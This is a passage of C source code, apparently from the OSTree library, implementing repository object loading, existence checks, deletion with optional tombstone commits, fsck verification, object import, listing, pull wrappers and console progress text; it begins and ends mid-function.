    (out_fd || out_xattrs || self->mode == OSTREE_REPO_MODE_BARE_USER);
  /* If it's a regular file and we're requested to return the fd, do it now. As
   * a special case in bare-user, we always do an open, since the stat() metadata
   * lives there.
   */
  if (need_open && S_ISREG (stbuf.st_mode))
    {
      fd = openat (objdir_fd, loose_path_buf, O_CLOEXEC | O_RDONLY);
      if (fd < 0)
        return glnx_throw_errno_prefix (error, "openat");
    }

  if (!(S_ISREG (stbuf.st_mode) || S_ISLNK (stbuf.st_mode)))
    return glnx_throw (error, "Not a regular file or symlink");

  /* In the non-bare-user case, gather symlink info if requested */
  if (self->mode != OSTREE_REPO_MODE_BARE_USER
      && S_ISLNK (stbuf.st_mode) && out_symlink)
    {
      ret_symlink = glnx_readlinkat_malloc (objdir_fd, loose_path_buf,
                                            cancellable, error);
      if (!ret_symlink)
        return FALSE;
    }

  if (self->mode == OSTREE_REPO_MODE_BARE_USER)
    {
      /* In bare-user, the canonical uid/gid/mode/xattrs live in the
       * user.ostreemeta xattr, not in the on-disk stat metadata */
      g_autoptr(GBytes) bytes = glnx_fgetxattr_bytes (fd, "user.ostreemeta", error);
      if (bytes == NULL)
        return FALSE;

      g_autoptr(GVariant) metadata = g_variant_ref_sink (g_variant_new_from_bytes (OSTREE_FILEMETA_GVARIANT_FORMAT,
                                                                                   bytes, FALSE));

      ret_xattrs = filemeta_to_stat (&stbuf, metadata);
      if (S_ISLNK (stbuf.st_mode))
        {
          if (out_symlink)
            {
              char targetbuf[PATH_MAX+1];
              gsize target_size;
              g_autoptr(GInputStream) target_input = g_unix_input_stream_new (fd, FALSE);
              if (!g_input_stream_read_all (target_input, targetbuf, sizeof (targetbuf),
                                            &target_size, cancellable, error))
                return FALSE;
              ret_symlink = g_strndup (targetbuf, target_size);
            }
          /* In the symlink case, we don't want to return the bare-user fd */
          glnx_close_fd (&fd);
        }
    }
  else if (self->mode == OSTREE_REPO_MODE_BARE_USER_ONLY)
    {
      /* Canonical info is: uid/gid is 0 and no xattrs, which might be wrong
         and thus not validate correctly, but at least we report something
         consistent. */
      stbuf.st_uid = stbuf.st_gid = 0;
      if (out_xattrs)
        {
          GVariantBuilder builder;
          g_variant_builder_init (&builder, G_VARIANT_TYPE ("a(ayay)"));
          ret_xattrs = g_variant_ref_sink (g_variant_builder_end (&builder));
        }
    }
  else
    {
      g_assert (self->mode == OSTREE_REPO_MODE_BARE);

      if (S_ISREG (stbuf.st_mode) && out_xattrs)
        {
          if (self->disable_xattrs)
            ret_xattrs = g_variant_ref_sink (g_variant_new_array (G_VARIANT_TYPE ("(ayay)"), NULL, 0));
          else if (!glnx_fd_get_all_xattrs (fd, &ret_xattrs,
                                            cancellable, error))
            return FALSE;
        }
      else if (S_ISLNK (stbuf.st_mode) && out_xattrs)
        {
          if (self->disable_xattrs)
            ret_xattrs = g_variant_ref_sink (g_variant_new_array (G_VARIANT_TYPE ("(ayay)"), NULL, 0));
          else if (!glnx_dfd_name_get_all_xattrs (objdir_fd, loose_path_buf,
                                                  &ret_xattrs,
                                                  cancellable, error))
            return FALSE;
        }
    }

  if (out_fd)
    *out_fd = glnx_steal_fd (&fd);
  if (out_stbuf)
    *out_stbuf = stbuf;
  ot_transfer_out_value (out_symlink, &ret_symlink);
  ot_transfer_out_value (out_xattrs, &ret_xattrs);
  return TRUE;
}

/**
 * ostree_repo_load_file:
 * @self: Repo
 * @checksum: ASCII SHA256 checksum
 * @out_input: (out) (optional) (nullable): File content
 * @out_file_info: (out) (optional) (nullable): File information
 * @out_xattrs: (out) (optional) (nullable): Extended attributes
 * @cancellable: Cancellable
 * @error: Error
 *
 * Load content object, decomposing it into three parts: the actual
 * content (for regular files), the metadata, and extended attributes.
 */
gboolean
ostree_repo_load_file (OstreeRepo         *self,
                       const char         *checksum,
                       GInputStream      **out_input,
                       GFileInfo         **out_file_info,
                       GVariant          **out_xattrs,
                       GCancellable       *cancellable,
                       GError            **error)
{
  if (self->mode == OSTREE_REPO_MODE_ARCHIVE)
    return repo_load_file_archive (self, checksum, out_input, out_file_info, out_xattrs,
                                   cancellable, error);
  else
    {
      glnx_autofd int fd = -1;
      struct stat stbuf;
      g_autofree char *symlink_target = NULL;
      g_autoptr(GVariant) ret_xattrs = NULL;
      if (!_ostree_repo_load_file_bare (self, checksum,
                                        out_input ? &fd : NULL,
                                        out_file_info ? &stbuf : NULL,
                                        out_file_info ? &symlink_target : NULL,
                                        out_xattrs ? &ret_xattrs : NULL,
                                        cancellable, error))
        return FALSE;

      /* Convert fd → GInputStream and struct stat → GFileInfo */
      if (out_input)
        {
          if (fd != -1)
            *out_input = g_unix_input_stream_new (glnx_steal_fd (&fd), TRUE);
          else
            *out_input = NULL;
        }
      if (out_file_info)
        {
          *out_file_info = _ostree_stbuf_to_gfileinfo (&stbuf);
          if (S_ISLNK (stbuf.st_mode))
            g_file_info_set_symlink_target (*out_file_info, symlink_target);
          else
            g_assert (S_ISREG (stbuf.st_mode));
        }
      ot_transfer_out_value (out_xattrs, &ret_xattrs);
      return TRUE;
    }
}

/**
 * ostree_repo_load_object_stream:
 * @self: Repo
 * @objtype: Object type
 * @checksum: ASCII SHA256 checksum
 * @out_input: (out): Stream for object
 * @out_size: (out): Length of @out_input
 * @cancellable: Cancellable
 * @error: Error
 *
 * Load object as a stream; useful when copying objects between
 * repositories.
 */
gboolean
ostree_repo_load_object_stream (OstreeRepo         *self,
                                OstreeObjectType    objtype,
                                const char         *checksum,
                                GInputStream      **out_input,
                                guint64            *out_size,
                                GCancellable       *cancellable,
                                GError            **error)
{
  guint64 size;
  g_autoptr(GInputStream) ret_input = NULL;

  if (OSTREE_OBJECT_TYPE_IS_META (objtype))
    {
      if (!load_metadata_internal (self, objtype, checksum, TRUE, NULL,
                                   &ret_input, &size, NULL,
                                   cancellable, error))
        return FALSE;
    }
  else
    {
      /* Content objects are re-serialized into canonical stream form */
      g_autoptr(GInputStream) input = NULL;
      g_autoptr(GFileInfo) finfo = NULL;
      g_autoptr(GVariant) xattrs = NULL;

      if (!ostree_repo_load_file (self, checksum, &input, &finfo, &xattrs,
                                  cancellable, error))
        return FALSE;

      if (!ostree_raw_file_to_content_stream (input, finfo, xattrs,
                                              &ret_input, &size,
                                              cancellable, error))
        return FALSE;
    }

  ot_transfer_out_value (out_input, &ret_input);
  *out_size = size;
  return TRUE;
}

/*
 * _ostree_repo_has_loose_object:
 * @loose_path_buf: Buffer of size _OSTREE_LOOSE_PATH_MAX
 *
 * Locate object in repository; if it exists, @out_is_stored will be
 * set to TRUE. @loose_path_buf is always set to the loose path.
*/ gboolean _ostree_repo_has_loose_object (OstreeRepo *self, const char *checksum, OstreeObjectType objtype, gboolean *out_is_stored, GCancellable *cancellable, GError **error) { char loose_path_buf[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path_buf, checksum, objtype, self->mode); gboolean found = FALSE; /* It's easier to share code if we make this an array */ int dfd_searches[] = { -1, self->objects_dir_fd }; if (self->commit_stagedir.initialized) dfd_searches[0] = self->commit_stagedir.fd; for (guint i = 0; i < G_N_ELEMENTS (dfd_searches); i++) { int dfd = dfd_searches[i]; if (dfd == -1) continue; struct stat stbuf; if (TEMP_FAILURE_RETRY (fstatat (dfd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW)) < 0) { if (errno == ENOENT) ; /* Next dfd */ else return glnx_throw_errno_prefix (error, "fstatat(%s)", loose_path_buf); } else { found = TRUE; break; } } *out_is_stored = found; return TRUE; } /** * ostree_repo_has_object: * @self: Repo * @objtype: Object type * @checksum: ASCII SHA256 checksum * @out_have_object: (out): %TRUE if repository contains object * @cancellable: Cancellable * @error: Error * * Set @out_have_object to %TRUE if @self contains the given object; * %FALSE otherwise. 
* * Returns: %FALSE if an unexpected error occurred, %TRUE otherwise */ gboolean ostree_repo_has_object (OstreeRepo *self, OstreeObjectType objtype, const char *checksum, gboolean *out_have_object, GCancellable *cancellable, GError **error) { gboolean ret_have_object = FALSE; if (!_ostree_repo_has_loose_object (self, checksum, objtype, &ret_have_object, cancellable, error)) return FALSE; /* In the future, here is where we would also look up in metadata pack files */ if (!ret_have_object && self->parent_repo) { if (!ostree_repo_has_object (self->parent_repo, objtype, checksum, &ret_have_object, cancellable, error)) return FALSE; } if (out_have_object) *out_have_object = ret_have_object; return TRUE; } /** * ostree_repo_delete_object: * @self: Repo * @objtype: Object type * @sha256: Checksum * @cancellable: Cancellable * @error: Error * * Remove the object of type @objtype with checksum @sha256 * from the repository. An error of type %G_IO_ERROR_NOT_FOUND * is thrown if the object does not exist. */ gboolean ostree_repo_delete_object (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GCancellable *cancellable, GError **error) { char loose_path[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path, sha256, objtype, self->mode); if (objtype == OSTREE_OBJECT_TYPE_COMMIT) { char meta_loose[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (meta_loose, sha256, OSTREE_OBJECT_TYPE_COMMIT_META, self->mode); if (!ot_ensure_unlinked_at (self->objects_dir_fd, meta_loose, error)) return FALSE; } if (!glnx_unlinkat (self->objects_dir_fd, loose_path, 0, error)) return glnx_prefix_error (error, "Deleting object %s.%s", sha256, ostree_object_type_to_string (objtype)); /* If the repository is configured to use tombstone commits, create one when deleting a commit. 
*/ if (objtype == OSTREE_OBJECT_TYPE_COMMIT) { gboolean tombstone_commits = FALSE; GKeyFile *readonly_config = ostree_repo_get_config (self); if (!ot_keyfile_get_boolean_with_default (readonly_config, "core", "tombstone-commits", FALSE, &tombstone_commits, error)) return FALSE; if (tombstone_commits) { g_auto(GVariantBuilder) builder = OT_VARIANT_BUILDER_INITIALIZER; g_autoptr(GVariant) variant = NULL; g_variant_builder_init (&builder, G_VARIANT_TYPE ("a{sv}")); g_variant_builder_add (&builder, "{sv}", "commit", g_variant_new_bytestring (sha256)); variant = g_variant_ref_sink (g_variant_builder_end (&builder)); if (!ostree_repo_write_metadata_trusted (self, OSTREE_OBJECT_TYPE_TOMBSTONE_COMMIT, sha256, variant, cancellable, error)) return FALSE; } } return TRUE; } /* Thin wrapper for _ostree_verify_metadata_object() */ static gboolean fsck_metadata_object (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GCancellable *cancellable, GError **error) { const char *errmsg = glnx_strjoina ("fsck ", sha256, ".", ostree_object_type_to_string (objtype)); GLNX_AUTO_PREFIX_ERROR (errmsg, error); g_autoptr(GVariant) metadata = NULL; if (!load_metadata_internal (self, objtype, sha256, TRUE, &metadata, NULL, NULL, NULL, cancellable, error)) return FALSE; return _ostree_verify_metadata_object (objtype, sha256, metadata, error); } static gboolean fsck_content_object (OstreeRepo *self, const char *sha256, GCancellable *cancellable, GError **error) { const char *errmsg = glnx_strjoina ("fsck content object ", sha256); GLNX_AUTO_PREFIX_ERROR (errmsg, error); g_autoptr(GInputStream) input = NULL; g_autoptr(GFileInfo) file_info = NULL; g_autoptr(GVariant) xattrs = NULL; if (!ostree_repo_load_file (self, sha256, &input, &file_info, &xattrs, cancellable, error)) return FALSE; /* TODO more consistency checks here */ const guint32 mode = g_file_info_get_attribute_uint32 (file_info, "unix::mode"); if (!ostree_validate_structureof_file_mode (mode, error)) return FALSE; 
  /* Recompute the object checksum from its content + metadata and compare
   * it against the checksum it is stored under. */
  g_autofree guchar *computed_csum = NULL;
  if (!ostree_checksum_file_from_input (file_info, xattrs, input, OSTREE_OBJECT_TYPE_FILE,
                                        &computed_csum, cancellable, error))
    return FALSE;

  char actual_checksum[OSTREE_SHA256_STRING_LEN+1];
  ostree_checksum_inplace_from_bytes (computed_csum, actual_checksum);
  return _ostree_compare_object_checksum (OSTREE_OBJECT_TYPE_FILE, sha256, actual_checksum, error);
}

/**
 * ostree_repo_fsck_object:
 * @self: Repo
 * @objtype: Object type
 * @sha256: Checksum
 * @cancellable: Cancellable
 * @error: Error
 *
 * Verify consistency of the object; this performs checks only relevant to the
 * immediate object itself, such as checksumming. This API call will not itself
 * traverse metadata objects for example.
 *
 * Since: 2017.15
 */
gboolean
ostree_repo_fsck_object (OstreeRepo           *self,
                         OstreeObjectType      objtype,
                         const char           *sha256,
                         GCancellable         *cancellable,
                         GError              **error)
{
  /* Dispatch on object class: metadata objects vs content (file) objects */
  if (OSTREE_OBJECT_TYPE_IS_META (objtype))
    return fsck_metadata_object (self, objtype, sha256, cancellable, error);
  else
    return fsck_content_object (self, sha256, cancellable, error);
}

/**
 * ostree_repo_import_object_from:
 * @self: Destination repo
 * @source: Source repo
 * @objtype: Object type
 * @checksum: checksum
 * @cancellable: Cancellable
 * @error: Error
 *
 * Copy object named by @objtype and @checksum into @self from the
 * source repository @source.  If both repositories are of the same
 * type and on the same filesystem, this will simply be a fast Unix
 * hard link operation.
 *
 * Otherwise, a copy will be performed.
 */
gboolean
ostree_repo_import_object_from (OstreeRepo           *self,
                                OstreeRepo           *source,
                                OstreeObjectType      objtype,
                                const char           *checksum,
                                GCancellable         *cancellable,
                                GError              **error)
{
  /* Trusted by default; see the _with_trust() variant for the untrusted path */
  return ostree_repo_import_object_from_with_trust (self, source, objtype,
                                                    checksum, TRUE, cancellable, error);
}

/**
 * ostree_repo_import_object_from_with_trust:
 * @self: Destination repo
 * @source: Source repo
 * @objtype: Object type
 * @checksum: checksum
 * @trusted: If %TRUE, assume the source repo is valid and trusted
 * @cancellable: Cancellable
 * @error: Error
 *
 * Copy object named by @objtype and @checksum into @self from the
 * source repository @source.  If @trusted is %TRUE and both
 * repositories are of the same type and on the same filesystem,
 * this will simply be a fast Unix hard link operation.
 *
 * Otherwise, a copy will be performed.
 *
 * Since: 2016.5
 */
gboolean
ostree_repo_import_object_from_with_trust (OstreeRepo           *self,
                                           OstreeRepo           *source,
                                           OstreeObjectType      objtype,
                                           const char           *checksum,
                                           gboolean              trusted,
                                           GCancellable         *cancellable,
                                           GError              **error)
{
  /* This just wraps a currently internal API, may make it public later */
  OstreeRepoImportFlags flags = trusted ? _OSTREE_REPO_IMPORT_FLAGS_TRUSTED : 0;
  return _ostree_repo_import_object (self, source, objtype, checksum,
                                     flags, cancellable, error);
}

/**
 * ostree_repo_query_object_storage_size:
 * @self: Repo
 * @objtype: Object type
 * @sha256: Checksum
 * @out_size: (out): Size in bytes object occupies physically
 * @cancellable: Cancellable
 * @error: Error
 *
 * Return the size in bytes of object with checksum @sha256, after any
 * compression has been applied.
 */
gboolean
ostree_repo_query_object_storage_size (OstreeRepo           *self,
                                       OstreeObjectType      objtype,
                                       const char           *sha256,
                                       guint64              *out_size,
                                       GCancellable         *cancellable,
                                       GError              **error)
{
  char loose_path[_OSTREE_LOOSE_PATH_MAX];
  _ostree_loose_path (loose_path, sha256, objtype, self->mode);

  int res;
  struct stat stbuf;
  /* Check the main objects directory first, then fall back to the staging
   * directory for a not-yet-committed transaction (if one is open). */
  res = TEMP_FAILURE_RETRY (fstatat (self->objects_dir_fd, loose_path, &stbuf, AT_SYMLINK_NOFOLLOW));
  if (res < 0 && errno == ENOENT && self->commit_stagedir.initialized)
    res = TEMP_FAILURE_RETRY (fstatat (self->commit_stagedir.fd, loose_path, &stbuf, AT_SYMLINK_NOFOLLOW));
  if (res < 0)
    return glnx_throw_errno_prefix (error, "Querying object %s.%s", sha256,
                                    ostree_object_type_to_string (objtype));

  /* On-disk (possibly compressed) size, not the logical object size */
  *out_size = stbuf.st_size;
  return TRUE;
}

/**
 * ostree_repo_load_variant_if_exists:
 * @self: Repo
 * @objtype: Object type
 * @sha256: ASCII checksum
 * @out_variant: (out) (transfer full): Metadata
 * @error: Error
 *
 * Attempt to load the metadata object @sha256 of type @objtype if it
 * exists, storing the result in @out_variant.  If it doesn't exist,
 * %NULL is returned.
 */
gboolean
ostree_repo_load_variant_if_exists (OstreeRepo       *self,
                                    OstreeObjectType  objtype,
                                    const char       *sha256,
                                    GVariant        **out_variant,
                                    GError          **error)
{
  /* FALSE => missing object is not an error; @out_variant stays %NULL */
  return load_metadata_internal (self, objtype, sha256, FALSE,
                                 out_variant, NULL, NULL, NULL, NULL, error);
}

/**
 * ostree_repo_load_variant:
 * @self: Repo
 * @objtype: Expected object type
 * @sha256: Checksum string
 * @out_variant: (out) (transfer full): Metadata object
 * @error: Error
 *
 * Load the metadata object @sha256 of type @objtype, storing the
 * result in @out_variant.
 */
gboolean
ostree_repo_load_variant (OstreeRepo       *self,
                          OstreeObjectType  objtype,
                          const char       *sha256,
                          GVariant        **out_variant,
                          GError          **error)
{
  /* TRUE => a missing object is reported as an error */
  return load_metadata_internal (self, objtype, sha256, TRUE,
                                 out_variant, NULL, NULL, NULL, NULL, error);
}

/**
 * ostree_repo_load_commit:
 * @self: Repo
 * @checksum: Commit checksum
 * @out_variant: (out) (allow-none): Commit
 * @out_state: (out) (allow-none): Commit state
 * @error: Error
 *
 * A version of ostree_repo_load_variant() specialized to commits,
 * capable of returning extended state information.  Currently
 * the only extended state is %OSTREE_REPO_COMMIT_STATE_PARTIAL, which
 * means that only a sub-path of the commit is available.
 */
gboolean
ostree_repo_load_commit (OstreeRepo            *self,
                         const char            *checksum,
                         GVariant             **out_variant,
                         OstreeRepoCommitState *out_state,
                         GError               **error)
{
  return load_metadata_internal (self, OSTREE_OBJECT_TYPE_COMMIT, checksum, TRUE,
                                 out_variant, NULL, NULL, out_state, NULL, error);
}

/**
 * ostree_repo_list_objects:
 * @self: Repo
 * @flags: Flags controlling enumeration
 * @out_objects: (out) (transfer container) (element-type GVariant GVariant):
 * Map of serialized object name to variant data
 * @cancellable: Cancellable
 * @error: Error
 *
 * This function synchronously enumerates all objects in the
 * repository, returning data in @out_objects.  @out_objects
 * maps from keys returned by ostree_object_name_serialize()
 * to #GVariant values of type %OSTREE_REPO_LIST_OBJECTS_VARIANT_TYPE.
 *
 * Returns: %TRUE on success, %FALSE on error, and @error will be set
 */
gboolean
ostree_repo_list_objects (OstreeRepo                  *self,
                          OstreeRepoListObjectsFlags   flags,
                          GHashTable                 **out_objects,
                          GCancellable                *cancellable,
                          GError                     **error)
{
  g_return_val_if_fail (error == NULL || *error == NULL, FALSE);
  g_return_val_if_fail (self->inited, FALSE);

  /* Keys and values are both GVariants; the table owns a ref on each */
  g_autoptr(GHashTable) ret_objects =
    g_hash_table_new_full (ostree_hash_object_name, g_variant_equal,
                           (GDestroyNotify) g_variant_unref, (GDestroyNotify) g_variant_unref);

  /* ALL expands to both storage classes */
  if (flags & OSTREE_REPO_LIST_OBJECTS_ALL)
    flags |= (OSTREE_REPO_LIST_OBJECTS_LOOSE | OSTREE_REPO_LIST_OBJECTS_PACKED);

  if (flags & OSTREE_REPO_LIST_OBJECTS_LOOSE)
    {
      if (!list_loose_objects (self, ret_objects, NULL, cancellable, error))
        return FALSE;
      /* Unless NO_PARENTS was requested, also enumerate the parent repo */
      if ((flags & OSTREE_REPO_LIST_OBJECTS_NO_PARENTS) == 0 && self->parent_repo)
        {
          if (!list_loose_objects (self->parent_repo, ret_objects, NULL, cancellable, error))
            return FALSE;
        }
    }
  if (flags & OSTREE_REPO_LIST_OBJECTS_PACKED)
    {
      /* Nothing for now... */
    }

  ot_transfer_out_value (out_objects, &ret_objects);
  return TRUE;
}

/**
 * ostree_repo_list_commit_objects_starting_with:
 * @self: Repo
 * @start: List commits starting with this checksum
 * @out_commits: (out) (transfer container) (element-type GVariant GVariant):
 * Map of serialized commit name to variant data
 * @cancellable: Cancellable
 * @error: Error
 *
 * This function synchronously enumerates all commit objects starting
 * with @start, returning data in @out_commits.
 *
 * Returns: %TRUE on success, %FALSE on error, and @error will be set
 */
gboolean
ostree_repo_list_commit_objects_starting_with (OstreeRepo    *self,
                                               const char    *start,
                                               GHashTable   **out_commits,
                                               GCancellable  *cancellable,
                                               GError       **error)
{
  g_return_val_if_fail (error == NULL || *error == NULL, FALSE);
  g_return_val_if_fail (self->inited, FALSE);

  g_autoptr(GHashTable) ret_commits =
    g_hash_table_new_full (ostree_hash_object_name, g_variant_equal,
                           (GDestroyNotify) g_variant_unref, (GDestroyNotify) g_variant_unref);

  /* Passing @start restricts enumeration to commits whose checksum has
   * that prefix; the parent repo (if any) is always searched too. */
  if (!list_loose_objects (self, ret_commits, start, cancellable, error))
    return FALSE;

  if (self->parent_repo)
    {
      if (!list_loose_objects (self->parent_repo, ret_commits, start, cancellable, error))
        return FALSE;
    }

  ot_transfer_out_value (out_commits, &ret_commits);
  return TRUE;
}

/**
 * ostree_repo_read_commit:
 * @self: Repo
 * @ref: Ref or ASCII checksum
 * @out_root: (out): An #OstreeRepoFile corresponding to the root
 * @out_commit: (out): The resolved commit checksum
 * @cancellable: Cancellable
 * @error: Error
 *
 * Load the content for @ref into @out_root.
 */
gboolean
ostree_repo_read_commit (OstreeRepo    *self,
                         const char    *ref,
                         GFile        **out_root,
                         char         **out_commit,
                         GCancellable  *cancellable,
                         GError       **error)
{
  /* Resolve @ref (a ref name or checksum) to a concrete commit checksum */
  g_autofree char *resolved_commit = NULL;
  if (!ostree_repo_resolve_rev (self, ref, FALSE, &resolved_commit, error))
    return FALSE;

  g_autoptr(GFile) ret_root = (GFile*) _ostree_repo_file_new_for_commit (self, resolved_commit, error);
  if (!ret_root)
    return FALSE;

  /* Force resolution now so that a missing/partial tree errors here,
   * rather than lazily on first access by the caller */
  if (!ostree_repo_file_ensure_resolved ((OstreeRepoFile*)ret_root, error))
    return FALSE;

  ot_transfer_out_value(out_root, &ret_root);
  ot_transfer_out_value(out_commit, &resolved_commit);
  return TRUE;
}

/**
 * ostree_repo_pull:
 * @self: Repo
 * @remote_name: Name of remote
 * @refs_to_fetch: (array zero-terminated=1) (element-type utf8) (allow-none): Optional list of refs; if %NULL, fetch all configured refs
 * @flags: Options controlling fetch behavior
 * @progress: (allow-none): Progress
 * @cancellable: Cancellable
 * @error: Error
 *
 * Connect to the remote repository, fetching the specified set of
 * refs @refs_to_fetch.  For each ref that is changed, download the
 * commit, all metadata, and all content objects, storing them safely
 * on disk in @self.
 *
 * If @flags contains %OSTREE_REPO_PULL_FLAGS_MIRROR, and
 * the @refs_to_fetch is %NULL, and the remote repository contains a
 * summary file, then all refs will be fetched.
 *
 * If @flags contains %OSTREE_REPO_PULL_FLAGS_COMMIT_ONLY, then only the
 * metadata for the commits in @refs_to_fetch is pulled.
 *
 * Warning: This API will iterate the thread default main context,
 * which is a bug, but kept for compatibility reasons.  If you want to
 * avoid this, use g_main_context_push_thread_default() to push a new
 * one around this call.
 */
gboolean
ostree_repo_pull (OstreeRepo           *self,
                  const char           *remote_name,
                  char                **refs_to_fetch,
                  OstreeRepoPullFlags   flags,
                  OstreeAsyncProgress  *progress,
                  GCancellable         *cancellable,
                  GError              **error)
{
  /* Convenience wrapper: pull the whole tree (no subdir restriction) */
  return ostree_repo_pull_one_dir (self, remote_name, NULL, refs_to_fetch,
                                   flags, progress, cancellable, error);
}

/**
 * ostree_repo_pull_one_dir:
 * @self: Repo
 * @remote_name: Name of remote
 * @dir_to_pull: Subdirectory path
 * @refs_to_fetch: (array zero-terminated=1) (element-type utf8) (allow-none): Optional list of refs; if %NULL, fetch all configured refs
 * @flags: Options controlling fetch behavior
 * @progress: (allow-none): Progress
 * @cancellable: Cancellable
 * @error: Error
 *
 * This is similar to ostree_repo_pull(), but only fetches a single
 * subpath.
 */
gboolean
ostree_repo_pull_one_dir (OstreeRepo           *self,
                          const char           *remote_name,
                          const char           *dir_to_pull,
                          char                **refs_to_fetch,
                          OstreeRepoPullFlags   flags,
                          OstreeAsyncProgress  *progress,
                          GCancellable         *cancellable,
                          GError              **error)
{
  /* Translate the positional arguments into the a{sv} options dict
   * consumed by ostree_repo_pull_with_options() */
  GVariantBuilder builder;
  g_autoptr(GVariant) options = NULL;
  g_variant_builder_init (&builder, G_VARIANT_TYPE ("a{sv}"));

  if (dir_to_pull)
    g_variant_builder_add (&builder, "{s@v}", "subdir",
                           g_variant_new_variant (g_variant_new_string (dir_to_pull)));
  g_variant_builder_add (&builder, "{s@v}", "flags",
                         g_variant_new_variant (g_variant_new_int32 (flags)));
  if (refs_to_fetch)
    g_variant_builder_add (&builder, "{s@v}", "refs",
                           g_variant_new_variant (g_variant_new_strv ((const char *const*) refs_to_fetch, -1)));

  options = g_variant_ref_sink (g_variant_builder_end (&builder));
  return ostree_repo_pull_with_options (self, remote_name, options,
                                        progress, cancellable, error);
}

/**
 * _formatted_time_remaining_from_seconds
 * @seconds_remaining: Estimated number of seconds remaining.
 *
 * Returns a strings showing the number of days, hours, minutes
 * and seconds remaining.
 **/
static char *
_formatted_time_remaining_from_seconds (guint64 seconds_remaining)
{
  guint64 minutes_remaining = seconds_remaining / 60;
  guint64 hours_remaining = minutes_remaining / 60;
  guint64 days_remaining = hours_remaining / 24;

  GString *description = g_string_new (NULL);

  /* Only emit the larger units when nonzero; each unit is reduced modulo
   * the next larger one.  Note every component (including the final
   * seconds) is followed by a trailing space — callers rely on that
   * when concatenating (e.g. "%sremaining" in the progress text). */
  if (days_remaining)
    g_string_append_printf (description, "%" G_GUINT64_FORMAT " days ", days_remaining);

  if (hours_remaining)
    g_string_append_printf (description, "%" G_GUINT64_FORMAT " hours ", hours_remaining % 24);

  if (minutes_remaining)
    g_string_append_printf (description, "%" G_GUINT64_FORMAT " minutes ", minutes_remaining % 60);

  g_string_append_printf (description, "%" G_GUINT64_FORMAT " seconds ", seconds_remaining % 60);

  /* FALSE => return the character data, freeing only the GString wrapper */
  return g_string_free (description, FALSE);
}

/**
 * ostree_repo_pull_default_console_progress_changed:
 * @progress: Async progress
 * @user_data: (allow-none): User data
 *
 * Convenient "changed" callback for use with
 * ostree_async_progress_new_and_connect() when pulling from a remote
 * repository.
 *
 * Depending on the state of the #OstreeAsyncProgress, either displays a
 * custom status message, or else outstanding fetch progress in bytes/sec,
 * or else outstanding content or metadata writes to the repository in
 * number of objects.
 *
 * Compatibility note: this function previously assumed that @user_data
 * was a pointer to a #GSConsole instance.  This is no longer the case,
 * and @user_data is ignored.
**/ void ostree_repo_pull_default_console_progress_changed (OstreeAsyncProgress *progress, gpointer user_data) { g_autofree char *status = NULL; gboolean caught_error, scanning; guint outstanding_fetches; guint outstanding_metadata_fetches; guint outstanding_writes; guint n_scanned_metadata; guint fetched_delta_parts; guint total_delta_parts; guint fetched_delta_part_fallbacks; guint total_delta_part_fallbacks; g_autoptr(GString) buf = g_string_new (""); ostree_async_progress_get (progress, "outstanding-fetches", "u", &outstanding_fetches, "outstanding-metadata-fetches", "u", &outstanding_metadata_fetches, "outstanding-writes", "u", &outstanding_writes, "caught-error", "b", &caught_error, "scanning", "u", &scanning, "scanned-metadata", "u", &n_scanned_metadata, "fetched-delta-parts", "u", &fetched_delta_parts, "total-delta-parts", "u", &total_delta_parts, "fetched-delta-fallbacks", "u", &fetched_delta_part_fallbacks, "total-delta-fallbacks", "u", &total_delta_part_fallbacks, "status", "s", &status, NULL); if (*status != '\0') { g_string_append (buf, status); } else if (caught_error) { g_string_append_printf (buf, "Caught error, waiting for outstanding tasks"); } else if (outstanding_fetches) { guint64 bytes_transferred, start_time, total_delta_part_size; guint fetched, metadata_fetched, requested; guint64 current_time = g_get_monotonic_time (); g_autofree char *formatted_bytes_transferred = NULL; g_autofree char *formatted_bytes_sec = NULL; guint64 bytes_sec; /* Note: This is not atomic wrt the above getter call. 
*/ ostree_async_progress_get (progress, "bytes-transferred", "t", &bytes_transferred, "fetched", "u", &fetched, "metadata-fetched", "u", &metadata_fetched, "requested", "u", &requested, "start-time", "t", &start_time, "total-delta-part-size", "t", &total_delta_part_size, NULL); formatted_bytes_transferred = g_format_size_full (bytes_transferred, 0); /* Ignore the first second, or when we haven't transferred any * data, since those could cause divide by zero below. */ if ((current_time - start_time) < G_USEC_PER_SEC || bytes_transferred == 0) { bytes_sec = 0; formatted_bytes_sec = g_strdup ("-"); } else { bytes_sec = bytes_transferred / ((current_time - start_time) / G_USEC_PER_SEC); formatted_bytes_sec = g_format_size (bytes_sec); } /* Are we doing deltas? If so, we can be more accurate */ if (total_delta_parts > 0) { guint64 fetched_delta_part_size = ostree_async_progress_get_uint64 (progress, "fetched-delta-part-size"); g_autofree char *formatted_fetched = NULL; g_autofree char *formatted_total = NULL; /* Here we merge together deltaparts + fallbacks to avoid bloating the text UI */ fetched_delta_parts += fetched_delta_part_fallbacks; total_delta_parts += total_delta_part_fallbacks; formatted_fetched = g_format_size (fetched_delta_part_size); formatted_total = g_format_size (total_delta_part_size); if (bytes_sec > 0) { guint64 est_time_remaining = 0; if (total_delta_part_size > fetched_delta_part_size) est_time_remaining = (total_delta_part_size - fetched_delta_part_size) / bytes_sec; g_autofree char *formatted_est_time_remaining = _formatted_time_remaining_from_seconds (est_time_remaining); /* No space between %s and remaining, since formatted_est_time_remaining has a trailing space */ g_string_append_printf (buf, "Receiving delta parts: %u/%u %s/%s %s/s %sremaining", fetched_delta_parts, total_delta_parts, formatted_fetched, formatted_total, formatted_bytes_sec, formatted_est_time_remaining); } else { g_string_append_printf (buf, "Receiving delta parts: %u/%u 
